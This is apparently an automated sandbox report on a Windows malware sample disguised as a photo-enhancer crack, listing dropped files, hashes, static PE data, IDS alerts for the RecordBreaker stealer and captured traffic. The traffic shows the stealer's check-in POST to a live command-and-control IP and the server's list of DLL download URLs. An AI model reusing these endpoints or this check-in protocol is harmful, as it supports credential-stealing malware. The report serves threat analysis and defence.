                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...'.9b.........."!......................................................................@A........................tv..S....w...................................5..hq..............................................D{...............................text...V........................... ..`.rdata..............................@..@.data................~..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                      C:\Users\user\AppData\LocalLow\sqlite3.dll

                                      Download File
                                      Process:C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe
                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):1099223
                                      Entropy (8bit):6.502588297211263
                                      Encrypted:false
                                      SSDEEP:24576:9jxwSkSteuT4P/y7HjsXAGJyGvN5z4Rui2IXLbO:9Vww8HyrjsvyWN54RZH+
                                      MD5:DBF4F8DCEFB8056DC6BAE4B67FF810CE
                                      SHA1:BBAC1DD8A07C6069415C04B62747D794736D0689
                                      SHA-256:47B64311719000FA8C432165A0FDCDFED735D5B54977B052DE915B1CBBBF9D68
                                      SHA-512:B572CA2F2E4A5CC93E4FCC7A18C0AE6DF888AA4C55BC7DA591E316927A4B5CFCBDDA6E60018950BE891FF3B26F470CC5CCE34D217C2D35074322AB84C32A25D1
                                      Malicious:false
                                      Antivirus:
                                      • Antivirus: Metadefender, Detection: 0%, Browse
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...".,b.v.........!......................... .....a......................................... .........................n*................................... ...;...................................................................................text...............................`.P`.data...|'... ...(..................@.`..rdata...D...P...F...:..............@.`@.bss....(.............................`..edata..n*.......,..................@.0@.idata..............................@.0..CRT....,...........................@.0..tls.... ...........................@.0..rsrc...............................@.0..reloc...;... ...<..................@.0B/4......8....`......................@.@B/19.....R....p......................@..B/31.....]'...@...(..................@..B/45......-...p......................@..B/57.....\............&..............@.0B/70.....#............2..

                                      C:\Users\user\AppData\LocalLow\vcruntime140.dll

                                      Download File
                                      Process:C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe
                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):80128
                                      Entropy (8bit):6.906674531653877
                                      Encrypted:false
                                      SSDEEP:1536:l9j/j2886xv555et/MCsjw0BuRK3jteopUecbAdz86B+JfBL+eNv:l9j/j28V55At/zqw+IqLUecbAdz8lJrv
                                      MD5:1B171F9A428C44ACF85F89989007C328
                                      SHA1:6F25A874D6CBF8158CB7C491DCEDAA81CEAEBBAE
                                      SHA-256:9D02E952396BDFF3ABFE5654E07B7A713C84268A225E11ED9A3BF338ED1E424C
                                      SHA-512:99A06770EEA07F36ABC4AE0CECB2AE13C3ACB362B38B731C3BAED045BF76EA6B61EFE4089CD2EFAC27701E9443388322365BDB039CD388987B24D4A43C973BD1
                                      Malicious:false
                                      Antivirus:
                                      • Antivirus: Metadefender, Detection: 0%, Browse
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L....(.[.........."!.........................................................0......t(....@A.............................................................?... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\KbqArOlW06.exe.log

                                      Download File
                                      Process:C:\Users\user\Desktop\KbqArOlW06.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):859
                                      Entropy (8bit):5.373981576136143
                                      Encrypted:false
                                      SSDEEP:24:ML9E4KrgKDE4KGKN08AKha1qE4GiD0E4KeGj:MxHKEYHKGD8Aoa1qHGiD0HKeGj
                                      MD5:7B5289C8BE1CA53C52CC7E7D6CB25DC3
                                      SHA1:C10677CF351D7C5D6466BC37088DA5167DFA7673
                                      SHA-256:BC87EABFF428C355479C48BEA29DA6620274B680849BC5A09155B08C8B225F76
                                      SHA-512:1E18D202A2D0070E10BF8074D144091CD56C00EE0EC5D32DDAE1EDAD744647DB28BE45528EE8F910A6E1572B482A95B079468BCDA1D19AE566EDA09B8F16055B
                                      Malicious:true
                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\4e05e2e48b8a6dd267a8c9e25ef129a7\System.Core.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\49e5c0579db170be9741dccc34c1998e\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\6d7d43e19d7fc0006285b85b7e2c8702\System.Windows.Forms.ni.dll",0..

                                      C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe

                                      Download File
                                      Process:C:\Users\user\Desktop\KbqArOlW06.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):762660256
                                      Entropy (8bit):0.16011324299122182
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:881CBC2DA4C6467AEC519F4909371AF8
                                      SHA1:EC9C0F602456802254AC2659CD0B42EF97D32B62
                                      SHA-256:DCE4E4783AB5819869BAAE8B98812AABE7654BA2FF9D1E033548A52AF93E89A5
                                      SHA-512:E1D3221D3663E09B8258A4B3AD77A201E18A7CC880B359EDF1DD9A2123ED48C6B4888F27F7F9BAD9B2DA6328F5211FE709E94195E76288C9255997612415B098
                                      Malicious:true
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....b.....................l........d...........@..........................pu.......u...@..........................U@.O.....F.d....@u.].............u-.'....u..,...................................................p@..............................text...{........................... ..`.rdata..............................@..@.data...............................@....CRT................................@..@.2vB.....r?......t?................. ..`.a|D....h....p@.......@.............@....=xC......4...@...4..2@............. ..`.reloc...,....u.......t.............@..@.rsrc...]....@u..0....t.............@..@........................................................................................................................................................................................................................................................................

                                      C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe

                                      Download File
                                      Process:C:\Users\user\Desktop\KbqArOlW06.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):593460
                                      Entropy (8bit):7.708842476672564
                                      Encrypted:false
                                      SSDEEP:12288:RyIF9+rdfN1UfMM+tkY/MniANaeicSS+LqBs/P6YwoAe5dWT:RyI3+rdF1sYrMiANaob+LqBs+feOT
                                      MD5:B184AD382E1729FEEA1E7BB94307930F
                                      SHA1:B46E64520E624EBD330534EF6DC7F931DD3C41B5
                                      SHA-256:D5B69C60652584A9FE19F3CCBEA534CE749DF0A86FA30484B0E1D9EFD8DD58C7
                                      SHA-512:1C08393818441B6304500B1178AEF344A337DF915A7987A294EB67503F0F95FA77B070EE366A7309DA069C4D88645DBBAEE6296F14C1F5CF32DB54C4CA047483
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.........................................@.......................... ............@......@..............................|.... ..............................................................................................................CODE................................ ..`DATA....P...........................@...BSS......................................idata..|...........................@....tls.....................................rdata..............................@..P.reloc.. ...........................@..P.rsrc........ ......................@..P.............P......................@..P........................................................................................................................................

                                      C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp

                                      Download File
                                      Process:C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):772608
                                      Entropy (8bit):6.365859318194335
                                      Encrypted:false
                                      SSDEEP:12288:PqIRz+f+ui8TrPO37fzH4A63RRwDFtuXUZERmhrNh4dT9TaC+IGNbDtQPupXyx95:SIZg+uiirPO37fzH4A6haDbcUZEbdT9z
                                      MD5:D8467CA1F529C6C6DECB1B82DBAED1DF
                                      SHA1:A4A21C366A4F4331E13BADA80682A117C9D17BE2
                                      SHA-256:D12E8487B5941B9552E2AD2F742938CFF407CB80825AD4DBB1B54DE2C706CE81
                                      SHA-512:03A519849743A7F71AE2974B4D5D08CEBA8555F06FF8C64A4A99749BBEF99D59F40EFFC34F3F8AFBB56D8370C1171A5F5BA5DE4D0CA830BFB28B16C5E6956257
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*............................,.............@.......................................@......@..............................2&...........................P...............................@......................................................CODE....p........................... ..`DATA....D...........................@...BSS......................................idata..2&.......(..................@....tls.........0...........................rdata.......@......................@..P.reloc.. ....P......................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Users\user\AppData\Local\Temp\is-Q7MJ8.tmp\_isetup\_setup64.tmp

                                      Download File
                                      Process:C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp
                                      File Type:PE32+ executable (console) x86-64, for MS Windows
                                      Category:dropped
                                      Size (bytes):6144
                                      Entropy (8bit):4.720366600008286
                                      Encrypted:false
                                      SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                      MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                      SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                      SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                      SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                      Malicious:false
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................

                                      Static File Info

                                      General

                                      File type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                      Entropy (8bit):6.219776880669485
                                      TrID:
                                      • Win64 Executable GUI Net Framework (217006/5) 49.88%
                                      • Win64 Executable GUI (202006/5) 46.43%
                                      • Win64 Executable (generic) (12005/4) 2.76%
                                      • Generic Win/DOS Executable (2004/3) 0.46%
                                      • DOS Executable Generic (2002/1) 0.46%
                                      File name:KbqArOlW06.exe
                                      File size:12978176
                                      MD5:005297e7c0d555822b5a6f31fcdc7661
                                      SHA1:9d5f9d90a1574c333ec68dbc800cb70397a1826d
                                      SHA256:6b8dac8326076b76369a8eb4e316a86a7663b597aeffe89b35e86c02aa5df4c0
                                      SHA512:0b274948a9a660483d8a64170c39aeee37a8a134fc926a1adc7d9884687cfd5ef9b8c32791ad74d81454778e6ace037454b012b769eeb8367d524fc7a51b663d
                                      SSDEEP:98304:QxQiz9Gm4H4Ul8zl6CH1OzkcC2IBev7CEObzWxtef1lKhx0vBaU6/yYsXd3VrJSp:QQszlVVOu2I8vJObShhyvBaUeY3+
                                      TLSH:9ED633E12F8CCA29F3A5C639A159867982BB9E19F256780DE6F07C0D1F2579371213CC
                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....5.b.........."...................... .....@..... .......................@............@...@......@............... .....

                                      File Icon

                                      Icon Hash:99da7233a0e2c9c9

                                      Static PE Info

                                      General

                                      Entrypoint:0x140000000
                                      Entrypoint Section:
                                      Digitally signed:false
                                      Imagebase:0x140000000
                                      Subsystem:windows gui
                                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                      Time Stamp:0x62E83593 [Mon Aug 1 20:20:35 2022 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:v4.0.30319
                                      OS Version Major:4
                                      OS Version Minor:0
                                      File Version Major:4
                                      File Version Minor:0
                                      Subsystem Version Major:4
                                      Subsystem Version Minor:0
                                      Import Hash:

                                      Entrypoint Preview

                                      Instruction
                                      dec ebp
                                      pop edx
                                      nop
                                      add byte ptr [ebx], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax+eax], al
                                      add byte ptr [eax], al

                                      Data Directories

                                      NameVirtual AddressVirtual Size Is in Section
                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xc540000xe9d0.rsrc
                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20000x48.text
                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                      Sections

                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                      .text0x20000xc51ad80xc51c00unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                      .rsrc0xc540000xe9d00xea00False0.24090211004273504data3.4100373155600514IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                      Resources

                                      NameRVASizeTypeLanguageCountry
                                      RT_ICON0xc545180xe1dcdBase III DBT, version number 0, next free block index 40
                                      RT_GROUP_ICON0xc626f80x14data
                                      RT_VERSION0xc541300x3e4data
                                      RT_MANIFEST0xc627100x2bdXML 1.0 document, ASCII text, with CRLF line terminators

                                      Network Behavior

                                      Snort IDS Alerts

                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                      192.168.2.451.195.166.17849778802036934 08/05/22-13:54:12.723337TCP2036934ET TROJAN Win32/RecordBreaker CnC Checkin4977880192.168.2.451.195.166.178
                                      51.195.166.178192.168.2.480497782036955 08/05/22-13:54:12.825297TCP2036955ET TROJAN Win32/RecordBreaker CnC Checkin - Server Response804977851.195.166.178192.168.2.4

                                      Network Port Distribution

                                      TCP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      Aug 5, 2022 13:54:12.681298971 CEST4977880192.168.2.451.195.166.178
                                      Aug 5, 2022 13:54:12.710944891 CEST804977851.195.166.178192.168.2.4
                                      Aug 5, 2022 13:54:12.712569952 CEST4977880192.168.2.451.195.166.178
                                      Aug 5, 2022 13:54:12.723336935 CEST4977880192.168.2.451.195.166.178
                                      Aug 5, 2022 13:54:12.752590895 CEST804977851.195.166.178192.168.2.4
                                      Aug 5, 2022 13:54:12.825297117 CEST804977851.195.166.178192.168.2.4
                                      Aug 5, 2022 13:54:12.825330973 CEST804977851.195.166.178192.168.2.4
                                      Aug 5, 2022 13:54:12.825359106 CEST804977851.195.166.178192.168.2.4
                                      Aug 5, 2022 13:54:12.825387001 CEST804977851.195.166.178192.168.2.4
                                      Aug 5, 2022 13:54:12.825391054 CEST4977880192.168.2.451.195.166.178
                                      Aug 5, 2022 13:54:12.825413942 CEST804977851.195.166.178192.168.2.4
                                      Aug 5, 2022 13:54:12.825423002 CEST4977880192.168.2.451.195.166.178
                                      Aug 5, 2022 13:54:12.825448990 CEST4977880192.168.2.451.195.166.178
                                      Aug 5, 2022 13:54:13.039436102 CEST4977880192.168.2.451.195.166.178
                                      Aug 5, 2022 13:54:13.068814039 CEST804977851.195.166.178192.168.2.4
                                      Aug 5, 2022 13:54:13.091945887 CEST804977851.195.166.178192.168.2.4
                                      Aug 5, 2022 13:54:13.091986895 CEST804977851.195.166.178192.168.2.4
                                      Aug 5, 2022 13:54:13.092000008 CEST804977851.195.166.178192.168.2.4
                                      Aug 5, 2022 13:54:13.092009068 CEST804977851.195.166.178192.168.2.4
                                      Aug 5, 2022 13:54:13.092021942 CEST804977851.195.166.178192.168.2.4
                                      Aug 5, 2022 13:54:13.092031956 CEST804977851.195.166.178192.168.2.4
                                      Aug 5, 2022 13:54:13.092041969 CEST804977851.195.166.178192.168.2.4
                                      Aug 5, 2022 13:54:13.092044115 CEST4977880192.168.2.451.195.166.178
                                      Aug 5, 2022 13:54:13.092051983 CEST804977851.195.166.178192.168.2.4
                                      Aug 5, 2022 13:54:13.092063904 CEST804977851.195.166.178192.168.2.4
                                      Aug 5, 2022 13:54:13.092076063 CEST804977851.195.166.178192.168.2.4
                                      Aug 5, 2022 13:54:13.092103958 CEST4977880192.168.2.451.195.166.178
                                      Aug 5, 2022 13:54:13.092124939 CEST4977880192.168.2.451.195.166.178
                                      Aug 5, 2022 13:54:13.121283054 CEST804977851.195.166.178192.168.2.4
                                      Aug 5, 2022 13:54:13.121335030 CEST804977851.195.166.178192.168.2.4
                                      Aug 5, 2022 13:54:13.121380091 CEST804977851.195.166.178192.168.2.4
                                      Aug 5, 2022 13:54:13.121418953 CEST804977851.195.166.178192.168.2.4
                                      Aug 5, 2022 13:54:13.121447086 CEST804977851.195.166.178192.168.2.4
                                      Aug 5, 2022 13:54:13.121448040 CEST4977880192.168.2.451.195.166.178
                                      Aug 5, 2022 13:54:13.121473074 CEST804977851.195.166.178192.168.2.4
                                      Aug 5, 2022 13:54:13.121489048 CEST4977880192.168.2.451.195.166.178
                                      Aug 5, 2022 13:54:13.121500969 CEST804977851.195.166.178192.168.2.4
                                      Aug 5, 2022 13:54:13.121510983 CEST4977880192.168.2.451.195.166.178
                                      Aug 5, 2022 13:54:13.121527910 CEST804977851.195.166.178192.168.2.4
                                      Aug 5, 2022 13:54:13.121550083 CEST4977880192.168.2.451.195.166.178
                                      Aug 5, 2022 13:54:13.121555090 CEST804977851.195.166.178192.168.2.4
                                      Aug 5, 2022 13:54:13.121572971 CEST4977880192.168.2.451.195.166.178
                                      Aug 5, 2022 13:54:13.121582031 CEST804977851.195.166.178192.168.2.4
                                      Aug 5, 2022 13:54:13.121594906 CEST4977880192.168.2.451.195.166.178
                                      Aug 5, 2022 13:54:13.121608019 CEST804977851.195.166.178192.168.2.4
                                      Aug 5, 2022 13:54:13.121622086 CEST4977880192.168.2.451.195.166.178
                                      Aug 5, 2022 13:54:13.121634960 CEST804977851.195.166.178192.168.2.4
                                      Aug 5, 2022 13:54:13.121645927 CEST4977880192.168.2.451.195.166.178
                                      Aug 5, 2022 13:54:13.121661901 CEST804977851.195.166.178192.168.2.4
                                      Aug 5, 2022 13:54:13.121670961 CEST4977880192.168.2.451.195.166.178
                                      Aug 5, 2022 13:54:13.121686935 CEST804977851.195.166.178192.168.2.4
                                      Aug 5, 2022 13:54:13.121712923 CEST804977851.195.166.178192.168.2.4
                                      Aug 5, 2022 13:54:13.121741056 CEST804977851.195.166.178192.168.2.4
                                      Aug 5, 2022 13:54:13.121757030 CEST4977880192.168.2.451.195.166.178
                                      Aug 5, 2022 13:54:13.121767998 CEST804977851.195.166.178192.168.2.4
                                      Aug 5, 2022 13:54:13.121793032 CEST4977880192.168.2.451.195.166.178
                                      Aug 5, 2022 13:54:13.121793985 CEST804977851.195.166.178192.168.2.4
                                      Aug 5, 2022 13:54:13.121819973 CEST804977851.195.166.178192.168.2.4
                                      Aug 5, 2022 13:54:13.121829033 CEST4977880192.168.2.451.195.166.178
                                      Aug 5, 2022 13:54:13.121846914 CEST804977851.195.166.178192.168.2.4
                                      Aug 5, 2022 13:54:13.121861935 CEST4977880192.168.2.451.195.166.178
                                      Aug 5, 2022 13:54:13.121895075 CEST4977880192.168.2.451.195.166.178
                                      Aug 5, 2022 13:54:13.151041031 CEST804977851.195.166.178192.168.2.4
                                      Aug 5, 2022 13:54:13.151124001 CEST804977851.195.166.178192.168.2.4
                                      Aug 5, 2022 13:54:13.151187897 CEST804977851.195.166.178192.168.2.4
                                      Aug 5, 2022 13:54:13.151228905 CEST4977880192.168.2.451.195.166.178
                                      Aug 5, 2022 13:54:13.151247025 CEST804977851.195.166.178192.168.2.4
                                      Aug 5, 2022 13:54:13.151263952 CEST4977880192.168.2.451.195.166.178
                                      Aug 5, 2022 13:54:13.151330948 CEST804977851.195.166.178192.168.2.4
                                      Aug 5, 2022 13:54:13.151417971 CEST4977880192.168.2.451.195.166.178
                                      Aug 5, 2022 13:54:13.151464939 CEST804977851.195.166.178192.168.2.4
                                      Aug 5, 2022 13:54:13.151509047 CEST804977851.195.166.178192.168.2.4
                                      Aug 5, 2022 13:54:13.151549101 CEST804977851.195.166.178192.168.2.4
                                      Aug 5, 2022 13:54:13.151549101 CEST4977880192.168.2.451.195.166.178
                                      Aug 5, 2022 13:54:13.151590109 CEST804977851.195.166.178192.168.2.4
                                      Aug 5, 2022 13:54:13.151628017 CEST804977851.195.166.178192.168.2.4
                                      Aug 5, 2022 13:54:13.151631117 CEST4977880192.168.2.451.195.166.178
                                      Aug 5, 2022 13:54:13.151664972 CEST804977851.195.166.178192.168.2.4
                                      Aug 5, 2022 13:54:13.151704073 CEST804977851.195.166.178192.168.2.4
                                      Aug 5, 2022 13:54:13.151705980 CEST4977880192.168.2.451.195.166.178
                                      Aug 5, 2022 13:54:13.151742935 CEST804977851.195.166.178192.168.2.4
                                      Aug 5, 2022 13:54:13.151782036 CEST4977880192.168.2.451.195.166.178
                                      Aug 5, 2022 13:54:13.151782036 CEST804977851.195.166.178192.168.2.4
                                      Aug 5, 2022 13:54:13.151822090 CEST804977851.195.166.178192.168.2.4
                                      Aug 5, 2022 13:54:13.151859045 CEST804977851.195.166.178192.168.2.4
                                      Aug 5, 2022 13:54:13.151864052 CEST4977880192.168.2.451.195.166.178
                                      Aug 5, 2022 13:54:13.151897907 CEST804977851.195.166.178192.168.2.4
                                      Aug 5, 2022 13:54:13.151935101 CEST4977880192.168.2.451.195.166.178
                                      Aug 5, 2022 13:54:13.151937008 CEST804977851.195.166.178192.168.2.4
                                      Aug 5, 2022 13:54:13.151973963 CEST804977851.195.166.178192.168.2.4
                                      Aug 5, 2022 13:54:13.152012110 CEST804977851.195.166.178192.168.2.4
                                      Aug 5, 2022 13:54:13.152015924 CEST4977880192.168.2.451.195.166.178
                                      Aug 5, 2022 13:54:13.152050018 CEST804977851.195.166.178192.168.2.4
                                      Aug 5, 2022 13:54:13.152072906 CEST4977880192.168.2.451.195.166.178
                                      Aug 5, 2022 13:54:13.152089119 CEST804977851.195.166.178192.168.2.4
                                      Aug 5, 2022 13:54:13.152117014 CEST4977880192.168.2.451.195.166.178
                                      Aug 5, 2022 13:54:13.152127981 CEST804977851.195.166.178192.168.2.4
                                      Aug 5, 2022 13:54:13.152137041 CEST4977880192.168.2.451.195.166.178
                                      Aug 5, 2022 13:54:13.152179003 CEST804977851.195.166.178192.168.2.4
                                      Aug 5, 2022 13:54:13.152218103 CEST804977851.195.166.178192.168.2.4

                                      HTTP Request Dependency Graph

                                      • 51.195.166.178

                                      HTTP Packets

                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      0192.168.2.44977851.195.166.17880C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe
                                      TimestampkBytes transferredDirectionData
                                      Aug 5, 2022 13:54:12.723336935 CEST1239OUTPOST / HTTP/1.1
                                      Accept: */*
                                      Content-Type: application/x-www-form-urlencoded; charset=utf-8
                                      User-Agent: mozzzzzzzzzzz
                                      Host: 51.195.166.178
                                      Content-Length: 94
                                      Connection: Keep-Alive
                                      Cache-Control: no-cache
                                      Data Raw: 6d 61 63 68 69 6e 65 49 64 3d 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 7c 6a 6f 6e 65 73 26 63 6f 6e 66 69 67 49 64 3d 35 31 37 62 62 30 64 36 34 30 63 31 32 34 32 63 33 66 30 36 39 61 61 62 33 64 31 30 31 38 64 36
                                      Data Ascii: machineId=d06ed635-68f6-4e9a-955c-4899f5f57b9a|user&configId=517bb0d640c1242c3f069aab3d1018d6
                                      Aug 5, 2022 13:54:12.825297117 CEST1241INHTTP/1.1 200 OK
                                      Server: nginx/1.14.0 (Ubuntu)
                                      Date: Fri, 05 Aug 2022 11:54:12 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Content-Length: 5278
                                      Connection: keep-alive
                                      Vary: Accept-Encoding
                                      Vary: Accept-Encoding
                                      Vary: Accept-Encoding
                                      Content-Security-Policy: default-src 'self';base-uri 'self';block-all-mixed-content;font-src 'self' https: data:;form-action 'self';frame-ancestors 'self';img-src 'self' data:;object-src 'none';script-src 'self';script-src-attr 'none';style-src 'self' https: 'unsafe-inline';upgrade-insecure-requests
                                      Cross-Origin-Embedder-Policy: require-corp
                                      Cross-Origin-Opener-Policy: same-origin
                                      Cross-Origin-Resource-Policy: same-origin
                                      X-DNS-Prefetch-Control: off
                                      Expect-CT: max-age=0
                                      X-Frame-Options: SAMEORIGIN
                                      Strict-Transport-Security: max-age=15552000; includeSubDomains
                                      X-Download-Options: noopen
                                      X-Content-Type-Options: nosniff
                                      Origin-Agent-Cluster: ?1
                                      X-Permitted-Cross-Domain-Policies: none
                                      Referrer-Policy: no-referrer
                                      X-XSS-Protection: 0
                                      ETag: W/"149e-TUdOV6RAkxaWAE5TjHnQPtGZ6P4"
                                      Data Raw: 6c 69 62 73 5f 6e 73 73 33 3a 68 74 74 70 3a 2f 2f 35 31 2e 31 39 35 2e 31 36 36 2e 31 37 38 2f 61 4e 37 6a 44 30 71 4f 36 6b 54 35 62 4b 35 62 51 34 65 52 38 66 45 31 78 50 37 68 4c 32 76 4b 2f 6e 73 73 33 2e 64 6c 6c 0a 6c 69 62 73 5f 6d 73 76 63 70 31 34 30 3a 68 74 74 70 3a 2f 2f 35 31 2e 31 39 35 2e 31 36 36 2e 31 37 38 2f 61 4e 37 6a 44 30 71 4f 36 6b 54 35 62 4b 35 62 51 34 65 52 38 66 45 31 78 50 37 68 4c 32 76 4b 2f 6d 73 76 63 70 31 34 30 2e 64 6c 6c 0a 6c 69 62 73 5f 76 63 72 75 6e 74 69 6d 65 31 34 30 3a 68 74 74 70 3a 2f 2f 35 31 2e 31 39 35 2e 31 36 36 2e 31 37 38 2f 61 4e 37 6a 44 30 71 4f 36 6b 54 35 62 4b 35 62 51 34 65 52 38 66 45 31 78 50 37 68 4c 32 76 4b 2f 76 63 72 75 6e 74 69 6d 65 31 34 30 2e 64 6c 6c 0a 6c 69 62 73 5f 6d 6f 7a 67 6c 75 65 3a 68 74 74 70 3a 2f 2f 35 31 2e 31 39 35 2e 31 36 36 2e 31 37 38 2f 61 4e 37 6a 44 30 71 4f 36 6b 54 35 62 4b 35 62 51 34
                                      Data Ascii: libs_nss3:http://51.195.166.178/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/nss3.dlllibs_msvcp140:http://51.195.166.178/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/msvcp140.dlllibs_vcruntime140:http://51.195.166.178/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/vcruntime140.dlllibs_mozglue:http://51.195.166.178/aN7jD0qO6kT5bK5bQ4
                                      Aug 5, 2022 13:54:13.039436102 CEST1246OUTGET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/nss3.dll HTTP/1.1
                                      Content-Type: text/plain;
                                      User-Agent: record
                                      Host: 51.195.166.178
                                      Connection: Keep-Alive
                                      Cache-Control: no-cache
                                      Aug 5, 2022 13:54:13.091945887 CEST1248INHTTP/1.1 200 OK
                                      Server: nginx/1.14.0 (Ubuntu)
                                      Date: Fri, 05 Aug 2022 11:54:13 GMT
                                      Content-Type: application/octet-stream
                                      Content-Length: 2042296
                                      Connection: keep-alive
                                      Last-Modified: Mon, 11 Apr 2022 14:39:48 GMT
                                      ETag: "62543db4-1f29b8"
                                      Accept-Ranges: bytes
